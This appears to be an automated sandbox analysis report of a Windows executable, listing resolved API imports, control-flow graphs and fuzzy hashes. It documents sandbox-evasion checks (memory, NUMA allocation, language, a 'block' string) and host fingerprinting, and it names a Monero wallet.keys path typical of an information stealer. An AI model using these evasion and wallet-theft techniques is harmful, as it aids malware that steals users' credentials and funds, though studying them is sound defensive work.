                  • LoadLibraryA.KERNEL32(0131DF38,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A04E
                  • LoadLibraryA.KERNEL32(0131DF68,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A060
                  • LoadLibraryA.KERNEL32(0131DF80,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A072
                  • LoadLibraryA.KERNEL32(0131DF98,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A083
                  • LoadLibraryA.KERNEL32(0131DFE0,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A095
                  • LoadLibraryA.KERNEL32(0131E430,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A0A7
                  • LoadLibraryA.KERNEL32(0131E148,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A0B8
                  • GetProcAddress.KERNEL32(75FD0000,01305080), ref: 0063A0DA
                  • GetProcAddress.KERNEL32(75FD0000,0131E160), ref: 0063A0F2
                  • GetProcAddress.KERNEL32(75FD0000,01319230), ref: 0063A10A
                  • GetProcAddress.KERNEL32(75FD0000,0131E3E8), ref: 0063A123
                  • GetProcAddress.KERNEL32(75FD0000,01305140), ref: 0063A13B
                  • GetProcAddress.KERNEL32(73530000,0130B620), ref: 0063A160
                  • GetProcAddress.KERNEL32(73530000,01305040), ref: 0063A179
                  • GetProcAddress.KERNEL32(73530000,0130B698), ref: 0063A191
                  • GetProcAddress.KERNEL32(73530000,0131E250), ref: 0063A1A9
                  • GetProcAddress.KERNEL32(73530000,0131E310), ref: 0063A1C2
                  • GetProcAddress.KERNEL32(73530000,01304E00), ref: 0063A1DA
                  • GetProcAddress.KERNEL32(73530000,01305020), ref: 0063A1F2
                  • GetProcAddress.KERNEL32(73530000,0131E328), ref: 0063A20B
                  • GetProcAddress.KERNEL32(763B0000,01304DC0), ref: 0063A22C
                  • GetProcAddress.KERNEL32(763B0000,01305100), ref: 0063A244
                  • GetProcAddress.KERNEL32(763B0000,0131E400), ref: 0063A25D
                  • GetProcAddress.KERNEL32(763B0000,0131E178), ref: 0063A275
                  • GetProcAddress.KERNEL32(763B0000,01305120), ref: 0063A28D
                  • GetProcAddress.KERNEL32(750F0000,0130B878), ref: 0063A2B3
                  • GetProcAddress.KERNEL32(750F0000,0130B918), ref: 0063A2CB
                  • GetProcAddress.KERNEL32(750F0000,0131E2C8), ref: 0063A2E3
                  • GetProcAddress.KERNEL32(750F0000,01305060), ref: 0063A2FC
                  • GetProcAddress.KERNEL32(750F0000,01304FE0), ref: 0063A314
                  • GetProcAddress.KERNEL32(750F0000,0130B738), ref: 0063A32C
                  • GetProcAddress.KERNEL32(75A50000,0131E388), ref: 0063A352
                  • GetProcAddress.KERNEL32(75A50000,01304F20), ref: 0063A36A
                  • GetProcAddress.KERNEL32(75A50000,01319240), ref: 0063A382
                  • GetProcAddress.KERNEL32(75A50000,0131E3A0), ref: 0063A39B
                  • GetProcAddress.KERNEL32(75A50000,0131E208), ref: 0063A3B3
                  • GetProcAddress.KERNEL32(75A50000,01304F80), ref: 0063A3CB
                  • GetProcAddress.KERNEL32(75A50000,01304E40), ref: 0063A3E4
                  • GetProcAddress.KERNEL32(75A50000,0131E220), ref: 0063A3FC
                  • GetProcAddress.KERNEL32(75A50000,0131E280), ref: 0063A414
                  • GetProcAddress.KERNEL32(75070000,01304E20), ref: 0063A436
                  • GetProcAddress.KERNEL32(75070000,0131E190), ref: 0063A44E
                  • GetProcAddress.KERNEL32(75070000,0131E1A8), ref: 0063A466
                  • GetProcAddress.KERNEL32(75070000,0131E340), ref: 0063A47F
                  • GetProcAddress.KERNEL32(75070000,0131E1F0), ref: 0063A497
                  • GetProcAddress.KERNEL32(74E50000,013050A0), ref: 0063A4B8
                  • GetProcAddress.KERNEL32(74E50000,013050C0), ref: 0063A4D1
                  • GetProcAddress.KERNEL32(75320000,01305160), ref: 0063A4F2
                  • GetProcAddress.KERNEL32(75320000,0131E2B0), ref: 0063A50A
                  • GetProcAddress.KERNEL32(6F060000,01304E60), ref: 0063A530
                  • GetProcAddress.KERNEL32(6F060000,01304F60), ref: 0063A548
                  • GetProcAddress.KERNEL32(6F060000,01305180), ref: 0063A560
                  • GetProcAddress.KERNEL32(6F060000,0131E1D8), ref: 0063A579
                  • GetProcAddress.KERNEL32(6F060000,01304EE0), ref: 0063A591
                  • GetProcAddress.KERNEL32(6F060000,01304F40), ref: 0063A5A9
                  • GetProcAddress.KERNEL32(6F060000,01304FA0), ref: 0063A5C2
                  • GetProcAddress.KERNEL32(6F060000,01304DA0), ref: 0063A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0063A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0063A607
                  • GetProcAddress.KERNEL32(74E00000,0131E298), ref: 0063A629
                  • GetProcAddress.KERNEL32(74E00000,013190A0), ref: 0063A641
                  • GetProcAddress.KERNEL32(74E00000,0131E1C0), ref: 0063A659
                  • GetProcAddress.KERNEL32(74E00000,0131E2E0), ref: 0063A672
                  • GetProcAddress.KERNEL32(74DF0000,01304DE0), ref: 0063A693
                  • GetProcAddress.KERNEL32(6D070000,0131E3B8), ref: 0063A6B4
                  • GetProcAddress.KERNEL32(6D070000,01304E80), ref: 0063A6CD
                  • GetProcAddress.KERNEL32(6D070000,0131E238), ref: 0063A6E5
                  • GetProcAddress.KERNEL32(6D070000,0131E358), ref: 0063A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a0a2b80014968d20d727e44e16c8785fc636c835520c4a13d90a17e941de7e87
                  • Instruction ID: 8117ffb0f1df4338897c8e912584821380e5e70090116de013b62d1161939755
                  • Opcode Fuzzy Hash: a0a2b80014968d20d727e44e16c8785fc636c835520c4a13d90a17e941de7e87
                  • Instruction Fuzzy Hash: 656242B5500200AFC34CDFA8FE9896637F9F74C701716A51AE645E3324DBB9A841DF52
                  Function 00635510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 858 635510-635577 call 635ad0 call 63a820 * 3 call 63a740 * 4 874 63557c-635583 858->874 875 6355d7-63564c call 63a740 * 2 call 621590 call 6352c0 call 63a8a0 call 63a800 call 63aad0 StrCmpCA 874->875 876 635585-6355b6 call 63a820 call 63a7a0 call 621590 call 6351f0 874->876 902 635693-6356a9 call 63aad0 StrCmpCA 875->902 906 63564e-63568e call 63a7a0 call 621590 call 6351f0 call 63a8a0 call 63a800 875->906 892 6355bb-6355d2 call 63a8a0 call 63a800 876->892 892->902 907 6356af-6356b6 902->907 908 6357dc-635844 call 63a8a0 call 63a820 * 2 call 621670 call 63a800 * 4 call 636560 call 621550 902->908 906->902 911 6357da-63585f call 63aad0 StrCmpCA 907->911 912 6356bc-6356c3 907->912 1038 635ac3-635ac6 908->1038 931 635991-6359f9 call 63a8a0 call 63a820 * 2 call 621670 call 63a800 * 4 call 636560 call 621550 911->931 932 635865-63586c 911->932 916 6356c5-635719 call 63a820 call 63a7a0 call 621590 call 6351f0 call 63a8a0 call 63a800 912->916 917 63571e-635793 call 63a740 * 2 call 621590 call 6352c0 call 63a8a0 call 63a800 call 63aad0 StrCmpCA 912->917 916->911 917->911 1017 635795-6357d5 call 63a7a0 call 621590 call 6351f0 call 63a8a0 call 63a800 917->1017 931->1038 938 635872-635879 932->938 939 63598f-635a14 call 63aad0 StrCmpCA 932->939 946 6358d3-635948 call 63a740 * 2 call 621590 call 6352c0 call 63a8a0 call 63a800 call 63aad0 StrCmpCA 938->946 947 63587b-6358ce call 63a820 call 63a7a0 call 621590 call 6351f0 call 63a8a0 call 63a800 938->947 967 635a16-635a21 Sleep 939->967 968 635a28-635a91 call 63a8a0 call 63a820 * 2 call 621670 call 63a800 * 4 call 636560 call 621550 939->968 946->939 1043 63594a-63598a call 63a7a0 call 621590 call 6351f0 call 63a8a0 call 63a800 946->1043 947->939 967->874 968->1038 1017->911 1043->939
                  APIs
                    • Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?,?,00624F05,00640DDE), ref: 0063A82B
                    • Part of subcall function 0063A820: lstrcpy.KERNEL32(00640DDE,00000000), ref: 0063A885
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006356A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635857
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635228
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 006352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635318
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 0063532F
                    • Part of subcall function 006352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00635364
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 00635383
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 006353AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0063578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00635A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 7bbe5549b0a65cc9f31af3f1e504cb1850567ffac4f5bbb1109d09d4df782e0d
                  • Instruction ID: 0652da9d5d9112dbe69886ee24855001acdc4c9d06650f9fd2a5d0cdd2e65a14
                  • Opcode Fuzzy Hash: 7bbe5549b0a65cc9f31af3f1e504cb1850567ffac4f5bbb1109d09d4df782e0d
                  • Instruction Fuzzy Hash: 95E13F72910104AACB58FBE0EC96AED737ABF54300F50812CF54767191EF746A09DBE6
                  Function 006317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1069 6317a0-6317cd call 63aad0 StrCmpCA 1072 6317d7-6317f1 call 63aad0 1069->1072 1073 6317cf-6317d1 ExitProcess 1069->1073 1077 6317f4-6317f8 1072->1077 1078 6319c2-6319cd call 63a800 1077->1078 1079 6317fe-631811 1077->1079 1080 631817-63181a 1079->1080 1081 63199e-6319bd 1079->1081 1083 631821-631830 call 63a820 1080->1083 1084 631849-631858 call 63a820 1080->1084 1085 6318cf-6318e0 StrCmpCA 1080->1085 1086 63198f-631999 call 63a820 1080->1086 1087 6318ad-6318be StrCmpCA 1080->1087 1088 631913-631924 StrCmpCA 1080->1088 1089 631932-631943 StrCmpCA 1080->1089 1090 6318f1-631902 StrCmpCA 1080->1090 1091 631951-631962 StrCmpCA 1080->1091 1092 631970-631981 StrCmpCA 1080->1092 1093 631835-631844 call 63a820 1080->1093 1094 63187f-631890 StrCmpCA 1080->1094 1095 63185d-63186e StrCmpCA 1080->1095 1081->1077 1083->1081 1084->1081 1114 6318e2-6318e5 1085->1114 1115 6318ec 1085->1115 1086->1081 1112 6318c0-6318c3 1087->1112 1113 6318ca 1087->1113 1118 631930 1088->1118 1119 631926-631929 1088->1119 1097 631945-631948 1089->1097 1098 63194f 1089->1098 1116 631904-631907 1090->1116 1117 63190e 1090->1117 1099 631964-631967 1091->1099 1100 63196e 1091->1100 1102 631983-631986 1092->1102 1103 63198d 1092->1103 1093->1081 1110 631892-63189c 1094->1110 1111 63189e-6318a1 1094->1111 1108 631870-631873 1095->1108 1109 63187a 1095->1109 1097->1098 1098->1081 1099->1100 1100->1081 1102->1103 1103->1081 1108->1109 1109->1081 1123 6318a8 1110->1123 1111->1123 1112->1113 1113->1081 1114->1115 1115->1081 1116->1117 1117->1081 1118->1081 1119->1118 1123->1081
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 006317C5
                  • ExitProcess.KERNEL32 ref: 006317D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 87ad121bb3488ca5189bc1cd819d313c41b7b6eaa3da1b8af2c6306cf0920c60
                  • Instruction ID: 7e03183847f7bf41e02457d55106a32fb3fbc60254bfeba26648b5e0347bafdd
                  • Opcode Fuzzy Hash: 87ad121bb3488ca5189bc1cd819d313c41b7b6eaa3da1b8af2c6306cf0920c60
                  • Instruction Fuzzy Hash: A05188B4A04209EFDB04DFA4D964BBE77B6BF45304F109058E806AB380D770E956DBA2
                  Function 00637500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1124 637500-63754a GetWindowsDirectoryA 1125 637553-6375c7 GetVolumeInformationA call 638d00 * 3 1124->1125 1126 63754c 1124->1126 1133 6375d8-6375df 1125->1133 1126->1125 1134 6375e1-6375fa call 638d00 1133->1134 1135 6375fc-637617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 637619-637626 call 63a740 1135->1137 1138 637628-637658 wsprintfA call 63a740 1135->1138 1145 63767e-63768e 1137->1145 1138->1145
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00637542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0063760A
                  • wsprintfA.USER32 ref: 00637640
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$d
                  • API String ID: 1544550907-3640471262
                  • Opcode ID: 262cd8ec6d0ffb8eb0f0fa8eced2af6ee1d4e11f3f6464f6e1ea445e0eb551a4
                  • Instruction ID: 5cc0f7776230d67582bd84c139e20bb5de01c41f719d6141fb6591100b7840f1
                  • Opcode Fuzzy Hash: 262cd8ec6d0ffb8eb0f0fa8eced2af6ee1d4e11f3f6464f6e1ea445e0eb551a4
                  • Instruction Fuzzy Hash: A2417EF1D04248ABDB24DB94DC85BEEBBB9AF18710F100199F50967280DB74AA44CFA5
                  Function 006369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310EA0), ref: 006398A1
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C30), ref: 006398BA
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310CD8), ref: 006398D2
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310BE8), ref: 006398EA
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C00), ref: 00639903
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,013191E0), ref: 0063991B
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01305540), ref: 00639933
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,013051A0), ref: 0063994C
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C48), ref: 00639964
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C60), ref: 0063997C
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C78), ref: 00639995
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310D20), ref: 006399AD
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01305520), ref: 006399C5
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310D38), ref: 006399DE
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 006211D0: ExitProcess.KERNEL32 ref: 00621211
                    • Part of subcall function 00621160: GetSystemInfo.KERNEL32(?), ref: 0062116A
                    • Part of subcall function 00621160: ExitProcess.KERNEL32 ref: 0062117E
                    • Part of subcall function 00621110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0062112B
                    • Part of subcall function 00621110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00621132
                    • Part of subcall function 00621110: ExitProcess.KERNEL32 ref: 00621143
                    • Part of subcall function 00621220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0062123E
                    • Part of subcall function 00621220: __aulldiv.LIBCMT ref: 00621258
                    • Part of subcall function 00621220: __aulldiv.LIBCMT ref: 00621266
                    • Part of subcall function 00621220: ExitProcess.KERNEL32 ref: 00621294
                    • Part of subcall function 00636770: GetUserDefaultLangID.KERNEL32 ref: 00636774
                    • Part of subcall function 00621190: ExitProcess.KERNEL32 ref: 006211C6
                    • Part of subcall function 00637850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                    • Part of subcall function 00637850: RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                    • Part of subcall function 00637850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                    • Part of subcall function 006378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                    • Part of subcall function 006378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                    • Part of subcall function 006378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00636AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00636AF9
                  • Sleep.KERNEL32(00001770), ref: 00636B04
                  • CloseHandle.KERNEL32(?,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636B1A
                  • ExitProcess.KERNEL32 ref: 00636B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 230273eced40f8739088f769e18ef912fea5a98b14290b4d3a21f7c3121a6d6a
                  • Instruction ID: 358caa1e7a39a6c835188f28003559deddff06d7f1d95cade6a5c73ad366c596
                  • Opcode Fuzzy Hash: 230273eced40f8739088f769e18ef912fea5a98b14290b4d3a21f7c3121a6d6a
                  • Instruction Fuzzy Hash: DA314F71914208AADB44F7F0DC56BEE777AAF14300F01451CF242B61C1DF706A05DAEA
                  Function 00621220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1204 621220-621247 call 6389b0 GlobalMemoryStatusEx 1207 621273-62127a 1204->1207 1208 621249-621271 call 63da00 * 2 1204->1208 1210 621281-621285 1207->1210 1208->1210 1212 621287 1210->1212 1213 62129a-62129d 1210->1213 1215 621292-621294 ExitProcess 1212->1215 1216 621289-621290 1212->1216 1216->1213 1216->1215
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0062123E
                  • __aulldiv.LIBCMT ref: 00621258
                  • __aulldiv.LIBCMT ref: 00621266
                  • ExitProcess.KERNEL32 ref: 00621294
                  Strings
                  Memory Dump Source
